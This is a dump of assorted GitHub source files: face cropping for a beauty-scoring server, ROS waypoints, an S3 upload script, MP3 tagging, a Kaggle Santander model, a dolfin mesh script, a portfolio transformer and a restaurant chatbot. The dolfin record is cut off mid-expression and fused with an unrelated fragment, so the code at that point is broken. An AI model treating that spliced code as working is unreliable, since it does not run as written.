plt.yticks([])","repo_name":"gopher93/-100DaysOfCode-Pyd-and-C-","sub_path":"Day3-edgeDetector.py","file_name":"Day3-edgeDetector.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26809707946","text":"from flask import Flask, request\nimport keras\nimport keras.models\nfrom scipy.misc import imread, imresize\nfrom io import BytesIO\nimport base64\nfrom flask_cors import CORS\nimport numpy\nimport json\nimport random\nimport math\nimport tensorflow as tf\nimport skimage.util\nimport skimage.draw\n\nfrom .tensorflow_face_detection.inference_usbCam_face import TensoflowFaceDector\n\napp = Flask(__name__)\nCORS(app)\n\nwith tf.device('/cpu:0'):\n beautyModel = keras.models.load_model('beauty_model')\n beautyModel._make_predict_function()\n\n PATH_TO_CKPT = './howhotami/tensorflow_face_detection/model/frozen_inference_graph_face.pb'\n tDetector = TensoflowFaceDector(PATH_TO_CKPT)\n\ndef cropFace(imageData):\n (boxes, scores, classes, num_detections) = tDetector.run(imageData)\n\n box = boxes[0][0]\n ymin, xmin, ymax, xmax = tuple(box)\n\n xmin = int(xmin * imageData.shape[1])\n xmax = int(xmax * imageData.shape[1])\n\n ymin = int(ymin * imageData.shape[0])\n ymax = int(ymax * imageData.shape[0])\n\n circleCenterX = int(xmax/2 + xmin/2)\n circleCenterY = int(ymax/2 + ymin/2)\n\n circleRadius = int(max(ymax - ymin, xmax - xmin) * 0.5 * 1.2)\n\n mask = numpy.zeros((imageData.shape[0], imageData.shape[1], 3), dtype=numpy.uint8)\n\n rr, cc = skimage.draw.circle(circleCenterY, circleCenterX, circleRadius, shape=(imageData.shape[0], imageData.shape[1]))\n mask[rr, cc, :] = 1\n\n out = imageData * mask\n white = 255 * (1.0 - mask)\n\n imageData = out + white\n\n xmin = circleCenterX - circleRadius\n xmax = circleCenterX + circleRadius\n\n ymin = circleCenterY - circleRadius\n ymax = 
circleCenterY + circleRadius\n\n    xmin = max(0, int(xmin))\n    xmax = min(imageData.shape[1], int(xmax))\n\n    ymin = max(0, int(ymin))\n    ymax = min(imageData.shape[0], int(ymax))\n\n    cropped = imageData[ymin:ymax, xmin:xmax, :]\n\n    return cropped\n\n\ndef cropFaceAndPad(imageData):\n    outWidth = 350\n    outHeight = 350\n\n    imageData = cropFace(imageData)\n\n    squareSize = max(imageData.shape[0], imageData.shape[1])\n\n    padHeight = (max(0, int(math.floor((squareSize-imageData.shape[0])/2))), max(0, int(math.ceil((squareSize-imageData.shape[0])/2))))\n    padWidth = (max(0, int(math.floor((squareSize-imageData.shape[1])/2))), max(0, int(math.ceil((squareSize-imageData.shape[1])/2))))\n\n    imageData = skimage.util.pad(imageData, pad_width=[padHeight, padWidth, (0, 0)], mode='constant', constant_values=255)\n\n    imageData = imresize(imageData, (outWidth, outHeight))\n\n    # Convert to greyscale\n    imageData = numpy.repeat(numpy.reshape(numpy.average(imageData, axis=2), newshape=(outWidth, outHeight, 1)), 3, axis=2)\n\n    return numpy.array(imageData, dtype=numpy.float64)\n\n","repo_name":"genixpro/how-hot-am-i","sub_path":"server/howhotami/face_cropper.py","file_name":"face_cropper.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42751274625","text":"n=2\ni=2\ndicio={}\nwhile n<1001:\n    contador=0\n    n=i\n    while n>1:\n        if n%2==0:\n            n=n/2\n            contador+=1\n        else:\n            n=n*3+1\n            contador+=1\n    n=i\n    dicio[i]=contador\n    i+=1\nprint(max(dicio,key=dicio.get))","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_116/ch39_2020_04_13_17_25_33_289697.py","file_name":"ch39_2020_04_13_17_25_33_289697.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20860796981","text":"import rclpy\nfrom rclpy.node import Node\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Twist, Pose\nfrom rclpy.qos import qos_profile_sensor_data\nfrom sensor_msgs.msg import LaserScan\nfrom nav_msgs.msg import OccupancyGrid\nimport numpy as np\nimport math\nimport cmath\nimport time\nimport pickle\n\n# constants\nnum_of_waypoints = 12\nwaypoints = {}\n\n# initialising the waypoints dict with an empty list per predefined waypoint\n# (indexing the empty dict with waypoints[i].extend([]) would raise a KeyError)\nfor i in range(1, num_of_waypoints + 1):\n    waypoints[i] = []\n\n# code from https://automaticaddison.com/how-to-convert-a-quaternion-into-euler-angles-in-python/\ndef euler_from_quaternion(x, y, z, w):\n    \"\"\"\n    Convert a quaternion into euler angles (roll, pitch, yaw)\n    roll is rotation around x in radians (counterclockwise)\n    pitch is rotation around y in radians (counterclockwise)\n    yaw is rotation around z in radians (counterclockwise)\n    \"\"\"\n    t0 = +2.0 * (w * x + y * z)\n    t1 = +1.0 - 2.0 * (x * x + y * y)\n    roll_x = math.atan2(t0, t1)\n\n    t2 = +2.0 * (w * y - z * x)\n    t2 = +1.0 if t2 > +1.0 else t2\n    t2 = -1.0 if t2 < -1.0 else t2\n    pitch_y = math.asin(t2)\n\n    t3 = +2.0 * (w * z + x * y)\n    t4 = +1.0 - 2.0 * (y * y + z * z)\n    yaw_z = math.atan2(t3, t4)\n\n    return roll_x, pitch_y, yaw_z # in radians\n    \nclass Waypoint(Node):\n\n    def __init__(self):\n        super().__init__('waypoint')\n        # initialize variables\n        self.roll = 0\n        self.pitch = 0\n        self.yaw = 0\n        self.px = 0.0\n        self.py = 0.0\n        self.ox = 0.0\n        self.oy = 0.0\n        self.oz = 0.0\n        \n        # create subscription to track orientation\n        self.m2b_subscription = self.create_subscription(\n            Pose,\n            'map2base',\n            self.m2b_callback,\n            10)\n        
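# Added note: holding the handle on self also stops the subscription from\n        # being garbage collected while the node is alive.\n        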
self.m2b_subscription # prevent unused variable warning\n        \n\n    def m2b_callback(self, msg):\n        self.px = msg.position.x\n        self.py = msg.position.y\n        orien = msg.orientation\n        self.ox, self.oy, self.oz = euler_from_quaternion(orien.x, orien.y, orien.z, orien.w)\n\n    \n    def get_waypoints(self):\n        n = num_of_waypoints\n        while n != 0:\n            inp = input(\"Enter input: \")\n            if inp == \"w\":\n                checkpt_id = int(input(\"Enter checkpoint: \"))\n                print(\"saving..\")\n                rclpy.spin_once(self)\n                \n                data = [self.px, self.py, self.ox, self.oy, self.oz]\n                waypoints[checkpt_id].extend(data)\n                print(waypoints)\n                n -= 1\n            elif inp == \"s\":\n                print(\"saving...\")\n                with open('waypoints.pickle', 'wb') as handle:\n                    pickle.dump(waypoints, handle, protocol=pickle.HIGHEST_PROTOCOL)\n                n -= 1\n            else:\n                print(\"Please enter 's' or 'w' only.\")\n\ndef main(args=None):\n    rclpy.init(args=args)\n    try:\n        waypoint = Waypoint()\n        start = input(\"Press s to start: \")\n        if start == \"s\":\n            waypoint.get_waypoints()\n    except KeyboardInterrupt:\n        waypoint.destroy_node()\n        rclpy.shutdown()\n\n\nif __name__ == '__main__':\n    main()","repo_name":"applepiofmyeye/navigation_eg2310","sub_path":"rpi/get_waypoints_m2b.py","file_name":"get_waypoints_m2b.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43923084265","text":"import logging\nimport boto3\nimport os\nimport sys\nfrom botocore.exceptions import ClientError\n\nACCESS_KEY = str(sys.argv[1])\nSECRET_KEY = str(sys.argv[2])\npath = 'C:/Users/patri/Documents/SSolutions/loadFile/'\nfile = sorted(os.listdir(path))[::-1][0]\ns3Folder = 'consumos'\n\ndef uploadToS3(file_name, bucket, object_name=None):\n    if object_name is None:\n        object_name = file_name\n\n    s3_client = boto3.client('s3',aws_access_key_id=ACCESS_KEY,aws_secret_access_key=SECRET_KEY)\n    try:\n        response = s3_client.upload_file(file_name, bucket, object_name)\n    except ClientError as e:\n        logging.error(e)\n        return False\n    return True\n\nresp = uploadToS3(path+str(file),'consumos-ss',s3Folder+'/'+str(file))\nprint(resp)\n","repo_name":"PatricioGT/SimingSolutions-DataEngineer","sub_path":"uploadToS3.py","file_name":"uploadToS3.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12477266721","text":"import re\nimport os\nimport mutagen\nfrom mutagen.easyid3 import EasyID3\n\n\n# audio = EasyID3('src/20120107晚清有个李鸿章.mp3')\n# print(len(audio.keys()))\n# for key in audio.keys():\n#     print(key, '-->', audio[key])\n\n\ndef getTitleFromFileName(filename):\n    filenameRegex = re.compile(r'(.*).mp3', re.IGNORECASE)\n    mo = filenameRegex.search(filename)\n    if mo == None:\n        return None\n    titleName = mo.group(1)\n    return titleName\n\n\nfolder_path = 'C:/Users/liang/Documents/压缩版/《2010年老梁说天下88集MP3》'\nalbum_name = folder_path.rsplit('/', 1)[1]\nprint(album_name)\nalbum_name = '2010年老梁说天下88集MP3'\nprint(album_name)\n\nfile_list = os.listdir(folder_path)\nfor index, f in enumerate(file_list):\n    title_name = getTitleFromFileName(f)\n    if title_name == None:\n        continue\n    print('###', index + 1)\n    print(f, '-->', title_name)\n    file_full_path = folder_path + '/' + f\n    try:\n        audio = EasyID3(file_full_path)\n    except mutagen.id3.ID3NoHeaderError:\n        audio = mutagen.File(file_full_path, easy=True)\n        audio.add_tags()\n    audio['title'] = title_name # title\n    audio['artist'] = '老梁' # artist\n    audio['album'] = album_name # album\n    audio['version'] = '' # subtitle\n    
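# Added note: EasyID3 accepts only its registered key names; assigning an\n    # empty string stores an empty value rather than deleting the tag.\n    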
audio['albumartist'] = '' # album artist\n    audio['composer'] = '' # composer\n    audio['conductor'] = '' # conductor\n    audio['grouping'] = '' # grouping description\n    audio['discnumber'] = '' # part of a set\n    audio['lyricist'] = '' # lyricist\n    audio['genre'] = '时评' # genre\n    audio['date'] = '2010' # year\n    audio.save()\n","repo_name":"ljyGmail/bulk_edit_mp3_files","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17213891527","text":"\"\"\"\nSantander Value Prediction Challenge\nhttps://www.kaggle.com/c/santander-value-prediction-challenge\n\nGoal: identify the value of transactions for each potential customer\nData: anonymized dataset containing numeric feature variables\nhttps://www.kaggle.com/c/santander-value-prediction-challenge/data\n\nAlgorithms Used: XGB with feature scoring, LGB\nSubmissions and Public Score:\n1-XGB+LGB+with leak train data - 4.55\n2-XGB+LGB+tuning+with leak train data - 1.56943\n\nReferences:\n- https://www.kaggle.com/zeus75/xgboost-features-scoring-with-ligthgbm-model\n- https://www.kaggle.com/johnfarrell/breaking-lb-fresh-start-with-lag-selection\n- https://www.kaggle.com/ogrellier/feature-scoring-vs-zeros\n- https://www.kaggle.com/tezdhar/breaking-lb-fresh-start\n- https://medium.com/@pushkarmandot/https-medium-com-pushkarmandot-what-is-lightgbm-how-to-implement-it-how-to-fine-tune-the-parameters-60347819b7fc\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport lightgbm as lgb\nfrom xgboost import XGBRegressor\nfrom sklearn.metrics import mean_squared_error, mean_squared_log_error\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, MaxAbsScaler\nfrom sklearn.model_selection import KFold\n\nprint('loading data')\ndata = pd.read_csv('data/train.csv')\ntarget = np.log1p(data['target'])\ndata.drop(['ID', 'target'], axis=1, inplace=True)\ntest = pd.read_csv('data/test.csv')\n\n# Add leaked training data from Kernel: Breaking LB - Fresh start with Lag Selection\n# https://www.kaggle.com/johnfarrell/breaking-lb-fresh-start-with-lag-selection/output\n# Exploits the fact that dataset is a time series in both dimensions\nleak = pd.read_csv('data/train_leak.csv')\ndata['leak'] = leak['compiled_leak'].values\ndata['log_leak'] = np.log1p(leak['compiled_leak'].values)\n\n# Feature scoring with XGB\ndef rmse(y_true, y_pred):\n    return mean_squared_error(y_true, y_pred) ** .5\n\nreg = XGBRegressor(n_estimators=10)\nfolds = KFold(n_splits=4, shuffle=True, random_state=42)\nfold_index = [(train, val) for train, val in folds.split(data)]\nscores = []\n\nnb_values = data.nunique(dropna=False)\nnb_zeros = (data == 0).astype(np.uint8).sum(axis=0)\n\nnonfeature_cols = ['log_leak', 'leak', 'target', 'ID']\nfeatures = [f for f in data.columns if f not in nonfeature_cols]\n\nprint('running xgb')\nfor feature in features:\n    score = 0\n    for train, val in fold_index:\n        reg.fit(\n            data[['log_leak', feature]].iloc[train],\n            target.iloc[train],\n            eval_set=[(data[['log_leak', feature]].iloc[val], target.iloc[val])],\n            eval_metric='rmse',\n            early_stopping_rounds=50,\n            verbose=False\n        )\n        score += rmse(\n            target.iloc[val],\n            reg.predict(\n                data[['log_leak', feature]].iloc[val],\n                ntree_limit=reg.best_ntree_limit)\n        ) / folds.n_splits\n    scores.append((feature, score))\n\nreport = pd.DataFrame(scores, columns=['feature', 'rmse']).set_index('feature')\nreport['nb_zeros'] = nb_zeros\nreport['nunique'] = nb_values\n
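# Added note: a lower single-feature RMSE (measured alongside log_leak) means\n# the feature is more predictive, so the ascending sort ranks features best-first.\n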
report.sort_values(by='rmse', ascending=True, inplace=True)\n\nreport.to_csv('feature_report.csv', index=True)\n\n# read the report back with the feature names as the index, so that\n# good_features below holds feature names rather than integer positions\nreport = pd.read_csv('feature_report.csv', index_col='feature')\n\nprint('feature selection')\n# Feature selection\nlow_rmse = report['rmse'] <= 0.7955\ngood_features = report.loc[low_rmse].index\nrmses = report.loc[low_rmse, 'rmse'].values\n\n# Add leak to test\ntest_leak = pd.read_csv('data/test_leak.csv')\ntest['leak'] = test_leak['compiled_leak']\ntest['log_leak'] = np.log1p(test_leak['compiled_leak'])\n\n# Model 1\n# Lightgbm\n\n# Use 5 splits this time\nfolds = KFold(n_splits=5, shuffle=True, random_state=1)\ndef add_stats(df):\n    df['log_of_mean'] = np.log1p(df[features].replace(0, np.nan).mean(axis=1))\n    df['mean_of_log'] = np.log1p(df[features]).replace(0, np.nan).mean(axis=1)\n    df['log_of_median'] = np.log1p(df[features].replace(0, np.nan).median(axis=1))\n    df['nb_nans'] = df[features].isnull().sum(axis=1)\n    df['the_sum'] = np.log1p(df[features].sum(axis=1))\n    df['the_std'] = df[features].std(axis=1)\n    df['the_kur'] = df[features].kurtosis(axis=1)\n\n    return df\n\ndata.replace(0, np.nan, inplace=True)\ndata = add_stats(data)\n\ntest.replace(0, np.nan, inplace=True)\ntest = add_stats(test)\n\n# Only use good features, log leak and stats for training\nextra_features = ['log_leak', 'log_of_mean', 'mean_of_log', 'log_of_median', 'nb_nans', 'the_sum', 'the_std', 'the_kur']\nfinal_features = good_features.tolist() + extra_features\noof_preds = np.zeros(data.shape[0])\ntest['target'] = 0\n\n# Params from zeus75 Kaggle kernel referenced above\nlgb_params = {\n    'objective': 'regression',\n    'num_leaves': 58,\n    'subsample': 0.6143,\n    'colsample_bytree': 0.6453,\n    'min_split_gain': np.power(10, -2.5988),\n    'reg_alpha': np.power(10, -2.2887),\n    'reg_lambda': np.power(10, 1.7570),\n    'min_child_weight': np.power(10, -0.1477),\n    'verbose': -1,\n    'seed': 3,\n    'boosting_type': 'gbdt',\n    'max_depth': -1,\n    'learning_rate': 0.05,\n    'metric': 'l2',\n}\n\nprint('running lgb')\ndef run_lgb(data, lgb, dtrain, target, oof_preds, lgb_params):\n    for train, val in folds.split(data):\n        clf = lgb.train(\n            params=lgb_params,\n            train_set=dtrain.subset(train),\n            valid_sets=dtrain.subset(val),\n            num_boost_round=10000,\n            early_stopping_rounds=100,\n            verbose_eval=0\n        )\n        oof_preds[val] = clf.predict(dtrain.data.iloc[val])\n        test['target'] += clf.predict(test[features]) / folds.n_splits\n        print(mean_squared_error(target.iloc[val], oof_preds[val]) ** .5)\n\ndtrain = lgb.Dataset(data=data[features], label=target, free_raw_data=False)\ndtrain.construct()\n\nrun_lgb(data, lgb, dtrain, target, oof_preds, lgb_params)\n\ndata['predictions'] = oof_preds\ndata.loc[data['leak'].notnull(), 'predictions'] = np.log1p(data.loc[data['leak'].notnull(),'leak'])\nprint('OOF SCORE : %9.6f' % (mean_squared_error(target, oof_preds) ** .5))\n# 12.66 on folds with n_split=4\nprint('OOF SCORE with LEAK : %9.6f' % (mean_squared_error(target, data['predictions']) ** .5))\n# 5.44 on folds with n_split=4\n\ntest['target'] = np.expm1(test['target'])\ntest.loc[test['leak'].notnull(), 'target'] = test.loc[test['leak'].notnull(), 'leak']\ntest[['ID', 'target']].to_csv('xgb-lgb-leak1.csv', index=False, float_format='%.2f')\n\n# Model 2\n# Tune lgb params\nlgb_params2 = {\n    'objective': 'regression',\n    'n_estimators': 500,\n    'max_bin': 10,\n    'subsample': 0.8,\n    'subsample_freq': 10,\n    'colsample_bytree': 0.8,\n    'learning_rate': 0.02,\n    'min_child_samples': 500\n}\n\nrun_lgb(data, lgb, dtrain, target, oof_preds, lgb_params2)\n# 1.40596 on folds with n_split=4\n# 1.39831 on folds with 
n_split=5\n\ndata['predictions'] = oof_preds\ndata.loc[data['leak'].notnull(), 'predictions'] = np.log1p(data.loc[data['leak'].notnull(),'leak'])\nprint('OOF SCORE : %9.6f' % (mean_squared_error(target, oof_preds) ** .5))\n# 1.422552 on folds with n_split=4\n# 1.428494 on folds with n_split=5\n\nprint('OOF SCORE with LEAK : %9.6f' % (mean_squared_error(target, data['predictions']) ** .5))\n# 0.715947 on folds with n_split=4\n# 0.716773 on folds with n_split=5\n\ntest['target'] = np.expm1(test['target'])\ntest.loc[test['leak'].notnull(), 'target'] = test.loc[test['leak'].notnull(), 'leak']\ntest[['ID', 'target']].to_csv('xgb-lgb-leak2.csv', index=False, float_format='%.2f')\n","repo_name":"anaerobeth/kaggle","sub_path":"santander/santander-xgb-lgb.py","file_name":"santander-xgb-lgb.py","file_ext":"py","file_size_in_byte":7357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74996966772","text":"\"\"\"\nPlatform Groups: group-get\n\"\"\"\nfrom typing import Optional, Union\n\nfrom app0.admin.db import db\nfrom app0.admin.group import Group\nfrom app0.admin.services.group_services import get_group_by_name\n\nfrom hopeit.app.api import event_api\nfrom hopeit.app.context import EventContext, PostprocessHook\n\n__steps__ = ['run']\n\n__api__ = event_api(\n query_args=[\n ('name', str, \"Group name\")\n ],\n responses={\n 200: (Group, \"Group\"),\n 404: (str, \"Group not found\")\n }\n)\n\n\nasync def run(payload: None,\n context: EventContext,\n name: str) -> Optional[Group]:\n es = db(context.env)\n return await get_group_by_name(es, name)\n\n\nasync def __postprocess__(payload: Optional[Group], context: EventContext,\n response: PostprocessHook) -> Union[Group, str]:\n if payload is None:\n response.status = 404\n return \"Group not found\"\n return payload\n","repo_name":"fhernand23/stateless-microservices-platform","sub_path":"app0-admin/app0-admin/src/app0/admin/api/group_get.py","file_name":"group_get.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"26991791353","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Licensed under the GNU General Public License, version 3.\n# See the file http://www.gnu.org/licenses/gpl.txt\n\nfrom pisi.actionsapi import get, pisitools, shelltools\n\nNoStrip = [\"/opt\", \"/usr\"]\nIgnoreAutodep = True\n\ndef install():\n pisitools.dodir(\"/opt/SynfigStudio\")\n pisitools.doexe(\"SynfigStudio-1.5.1-2021.10.21-linux64-2cb6c.appimage\", \"/opt/SynfigStudio\")\n pisitools.dosym(\"/opt/SynfigStudio/SynfigStudio-1.5.1-2021.10.21-linux64-2cb6c.appimage\", \"/usr/bin/SynfigStudio\")\n ","repo_name":"pisilinux/pisilife-2","sub_path":"multimedia/graphics/synfig/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"16380986735","text":"import numpy as np\n\nwith open('C:/Users/jboddy/Desktop/aoc/2020/day3input.txt', 'r') as file:\n \n input = [line.strip() for line in file]\n \n parsed_data = list(enumerate(input))\n \n part_1 = sum([(int(line[enum * 3 % len(line)] == '#')) for (enum, line) in parsed_data])\n print(part_1)\n \n jumper_right = [1,3,5,7,1]\n jumper_down = [1,1,1,1,2]\n part_2 = 1\n for (jump_right, jump_down) in zip(jumper_right, jumper_down):\n part_2 = part_2 * sum([int(line[int(enum * jump_right / jump_down % len(line))] == '#') for (enum, line) 
in parsed_data if (enum % jump_down) == 0])\n    print(part_2)\n    ","repo_name":"joshuaboddy/advent-of-code","sub_path":"2020/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"72554948854","text":"from dolfin import *\nimport mshr\nfrom sympy.utilities.codegen import ccode\nimport sympy\n\ncomm = mpi_comm_world()\nrank = MPI.rank(comm)\nset_log_level(INFO if rank ==0 else INFO+1)\nparameters[\"std_out_all_processes\"] = False\nparameters[\"ghost_mode\"] = \"shared_vertex\"\nparameters['form_compiler']['cpp_optimize'] = True\nparameters['form_compiler']['optimize'] = True\n\n#Domain and mesh\nW = 40.0 #Width\nH = 40.0 #Height\nresolution = 1.0\nmesh = RectangleMesh(Point(-W/2.0,-H/2.0),Point(W/2.0,H/2.0),int(W/resolution), int(H/resolution),'crossed')\n\n#Object translation in time\nx,y,t = sympy.symbols('x[0], x[1], t')\nPI = 3.141592\nc0 = 0.0\nc1 = 0.0+5.0*sympy.cos(2.0*PI*(t/0.5))\n\n#Object size\nwidth = 10.0\nheight = 3.0\nobjectBool = (x>c0-width/2.0) & (x<c0+width/2.0) & (y>c1-height/2.0) & (y<c1+height/2.0)\n        if pop > populacao:\n            populacao = pop\n            esta_pop = estado\n    return esta_pop\n    ","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_367/ch165_2020_06_21_15_20_09_384767.py","file_name":"ch165_2020_06_21_15_20_09_384767.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6620343167","text":"\"\"\"\n    Portfolio Models\n\n    @author: Younghyun Kim\n    Created: 2022.09.03\n\"\"\"\nimport torch\nimport torch.nn as nn\n\nfrom layers.mapping import Mapping\nfrom layers.transformer import TransformerEnc\n\nfrom models.cfg.ipa_config import IPA_CONFIG\n\n\nclass InvestingPortfolioAllocator(nn.Module):\n    \"\"\"\n    Investing Portfolio Allocator Class\n    \"\"\"\n    def __init__(self, config: dict = None):\n        \"\"\"\n        Initialization\n\n        Args:\n            config: config\n                * dtype: dict\n        \"\"\"\n        super().__init__()\n\n        if config is None:\n            config = IPA_CONFIG\n\n        self.config = config\n\n        self.factor_num = config['factor_num']\n        self.slope = config['slope']\n        self.dropout = config['dropout']\n        self.d_model = config['d_model']\n        self.nhead = config['nhead']\n        self.nlayers = config['nlayers']\n        self.activation = config['activation']\n        self.port_type_num = config['port_type_num']\n        self.stock_embeds_map_nlayers =\\\n            
nn.LayerNorm):\n module.bias.data.zero_()\n module.weight.data.fill_(1.0)\n\n @property\n def device(self):\n return next(self.parameters()).device\n\n def forward(self, stocks_in, port_type_idx,\n enc_time_mask=False, enc_key_padding_mask=None):\n \"\"\"\n Inference\n\n Args:\n stocks_in: multifactor scores data for observations\n * dtype: torch.FloatTensor\n * shape: (batch_size, stock_num, factor_num)\n port_type_idx: portfolio strategy type index\n * dtype: torch.LongTensor\n * shape: (batch_size)\n Returns:\n weights: portfolio weights\n * dtype: torch.FloatTensor\n * shape: (batch_size, stock_num)\n outputs: transformer outputs\n * dtype: torch.FloatTensor\n * shape: (batch_size, stock_num, d_model)\n \"\"\"\n batch_size, stock_num, _ = stocks_in.shape\n\n # Port Idx Info\n port_types = self.port_types_embeds(port_type_idx).unsqueeze(1)\n\n pe_port = self.positional_encoding(\n torch.tensor([0]).to(self.device)).view(1, 1, self.d_model)\n pe_port = pe_port.repeat(batch_size, 1, 1)\n\n ports = port_types + pe_port\n\n # Stock Encodings\n stocks_enc = self.stock_embeds(stocks_in)\n\n pe_stocks = self.positional_encoding(\n torch.tensor([1]).to(self.device)).view(1, 1, self.d_model)\n pe_stocks = pe_stocks.repeat(batch_size, stock_num, 1)\n\n stocks = stocks_enc + pe_stocks\n\n inputs = torch.cat((ports, stocks), dim=1)\n\n outputs = self.attn(inputs,\n enc_time_mask, enc_key_padding_mask)\n\n out_preds = self.w_allocator(outputs[:, 1:])\n weights = out_preds.squeeze(-1).softmax(dim=-1)\n\n return weights, outputs","repo_name":"kimyoungh/rich","sub_path":"models/portfolio.py","file_name":"portfolio.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13420262449","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom subprocess import call\nfrom speech_recognition.mainModule import Speech_Reg\nimport random\nfrom CrfTagger import CRFTagger\nfrom yelpAPI import GetAPIResults\nimport unicodedata\nimport re\nfrom nltk.tag.api import TaggerI\nfrom nltk.tag import StanfordPOSTagger\n\nimport os\n\nos.environ['CLASSPATH']=\"/Users/louis/Documents/CSCI_544/BSLVChatbot/stanford-postagger-2015-12-09/stanford-postagger.jar\"\nos.environ['STANFORD_MODELS']=\"/Users/louis/Documents/CSCI_544/BSLVChatbot/stanford-postagger-2015-12-09/models\"\n\nclass BSLVChatBot:\n\n def __init__(self):\n self.sr = Speech_Reg()\n\nclass Fix_choice:\n\n def __init__(self):\n self.bslvChatBotObj = BSLVChatBot().sr\n self.STARTUP_FILTER={}\n self.resultDict = {}\n self.analyzedSentimentDict = {}\n self.BOOLEAN_PRICE = False\n self.BOOLEAN_LOCATION = False\n self.BOOLEAN_CUISINE = False\n\n self.fetchedRestaurant=[]\n self.fetchedAddress = []\n self.fetchedURL = []\n\n self.PRICE_VALUE = \"\"\n self.LOCATION_VALUE = \"\"\n self.CUISINE_VALUE = \"\"\n\n self.STARTUP_FILTER[\"GREETING_WORDS\"]=[\"Hi, How may I help you\",\"What can I do for you Today\",\n \"How may I help you today\",\" Hi, Ready to eat ?\", \"Hi, I am happy you are here !. 
What type of restaurant you are looking for ?\"]\n\n self.STARTUP_FILTER['PRICE_GIVEN']=[\"Great!, May I know what location would you like ?\",\n \"Great!, May I know what type of cuisine would you like ?\",\"Location ?\",\n \"Cuisine?\",\"Awesome!, can you tell me location and Cuisine ?\",\n \"Any preferences of location and cuisine ?\",\"Location please\", \"May I know your choice of Cuisine please ?\"\n \"Cuisine and Location please\"]\n\n self.STARTUP_FILTER['LOCATION_GIVEN']=[\"I would like to know the type of cuisine please\",\"cuisine preferences?\",\n \"Wow!, good choice now tell me the price (Cheap / Moderate / Medium / Expensive) range \",\n \"Great place, can you tell me what cuisine and price (Cheap / Moderate / Medium / Expensive) you looking for?\",\n \"Price please (Cheap / Moderate / Medium / Expensive) \",\"Cuisine please\",\"great , May I know your preferred price (Cheap / Moderate / Medium / Expensive) range\"]\n\n self.STARTUP_FILTER['CUISINE_GIVEN']=[\"Tell me the Price (Cheap / Moderate / Medium / Expensive) range\",\"Tell me the location please\",\n \"Can you tell me the price (Cheap / Moderate / Medium / Expensive) and location\",\"Price please (Cheap / Moderate / Medium / Expensive) \",\"Any preferred price (Cheap / Moderate / Medium / Expensive)\",\n \"Any preferred location\",\n \"Good choice, I would like to know your preferred location as well\"]\n\n self.STARTUP_FILTER['PRICE_LOCATION_GIVEN']= [\"I just need one more Information, can you tell me the Cuisine type please\",\n \"Favourite cuisine ?\", \"Can I have your cuisine preference please ?\"]\n\n self.STARTUP_FILTER['PRICE_CUISINE_GIVEN'] = [\"Can you tell me the location please\",\"Location please\",\"Preferred Location?\",\n \"I would like to know what location you are looking for?\"]\n\n self.STARTUP_FILTER['LOCATION_CUISINE_GIVEN'] = [\"What price (Cheap / Moderate / Medium / Expensive) range you are looking for?\",\"Can you tell me the expected price (Cheap / Moderate / Medium / Expensive) please?\",\n \"May i know your price (Cheap / Moderate / Medium / Expensive) range?\",\"Any price preferences (Cheap / Moderate / Medium / Expensive) ?\"]\n\n self.STARTUP_FILTER['STANDARD_RESPONSE'] = [\"let's talk about restaurants\",\n \"I'm here to recommend you restaurants\",\"My knowledge is limited to restaurants\",\"I can assist you to choose good restaurants\", \"Shall we discuss about restaurants ?\"]\n\n self.STARTUP_FILTER['INCORRECT_ANSWERS'] = [\"Sorry, I didn't catch that\"]\n\n def temp_crf(self, sentence):\n split_list = sentence.split(\" \")\n ct = CRFTagger()\n ct.form_pos_tag_list(\"/Users/louis/Documents/CSCI_544/BSLVChatbot/pos_data.txt\")\n result = ct.tag(split_list)\n\n for word, tag in result:\n if 'B-CUISINE' in tag:\n if self.BOOLEAN_CUISINE == False:\n self.BOOLEAN_CUISINE = True\n self.CUISINE_VALUE = word.lower()\n if 'B-PRICE' in tag:\n if self.BOOLEAN_PRICE == False:\n self.BOOLEAN_PRICE = True\n self.PRICE_VALUE = word.lower()\n if 'B-LOCATION' in tag:\n if self.BOOLEAN_LOCATION == False:\n self.BOOLEAN_LOCATION = True\n self.LOCATION_VALUE = word.lower()\n if 'I-LOCATION' in tag:\n self.BOOLEAN_LOCATION = True\n self.LOCATION_VALUE += \" \"+word.lower()\n\n if self.BOOLEAN_LOCATION or self.BOOLEAN_PRICE or self.BOOLEAN_CUISINE:\n return self.fix_choice()\n else:\n return self.fix_choice(\"invalid_choice\")\n\n def handle_negatives(self):\n print(\"My apology. Can you please tell me with 